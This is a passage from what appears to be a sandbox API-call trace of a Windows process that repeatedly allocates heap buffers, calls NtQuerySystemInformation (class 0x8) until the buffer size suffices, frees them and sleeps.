ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.322] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0266.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0266.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0266.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0266.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0266.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0266.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0266.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.331] Sleep (dwMilliseconds=0x110) [0266.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0266.368] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.369] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0266.369] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0266.369] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.369] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0266.370] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0266.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0266.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0266.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0266.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.377] Sleep (dwMilliseconds=0x110) [0266.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0266.402] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.403] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0266.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0266.412] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0266.413] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0266.413] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.413] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0266.413] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0266.413] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0266.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.417] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.417] Sleep (dwMilliseconds=0x110) [0266.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0266.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0266.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0266.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0266.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0266.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0266.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0266.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.475] Sleep (dwMilliseconds=0x110) [0266.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0266.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0266.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0266.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0266.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0266.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0266.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0266.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0266.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.489] Sleep (dwMilliseconds=0x110) [0266.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0266.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0266.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0266.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0266.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0266.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0266.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0266.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0266.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.505] Sleep (dwMilliseconds=0x110) [0266.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0266.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0266.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0266.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0266.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0266.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0266.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0266.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0266.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.520] Sleep (dwMilliseconds=0x110) [0266.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0266.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0266.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0266.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0266.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0266.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0266.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0266.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0266.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.537] Sleep (dwMilliseconds=0x110) [0266.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0266.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0266.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0266.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0266.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0266.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0266.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0266.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0266.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.551] Sleep (dwMilliseconds=0x110) [0266.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0266.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0266.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0266.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0266.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0266.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0266.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0266.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0266.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.568] Sleep (dwMilliseconds=0x110) [0266.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0266.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0266.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0266.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0266.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0266.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0266.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0266.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0266.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.596] Sleep (dwMilliseconds=0x110) [0266.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0266.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0266.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0266.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0266.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0266.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0266.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0266.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0266.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.625] Sleep (dwMilliseconds=0x110) [0266.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0266.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0266.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0266.663] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.664] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0266.664] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0266.664] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.665] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0266.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0266.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0266.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.670] Sleep (dwMilliseconds=0x110) [0266.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0266.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0266.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0266.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0266.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0266.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0266.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0266.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0266.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0266.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0266.742] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0266.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0266.742] Sleep (dwMilliseconds=0x110) [0266.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 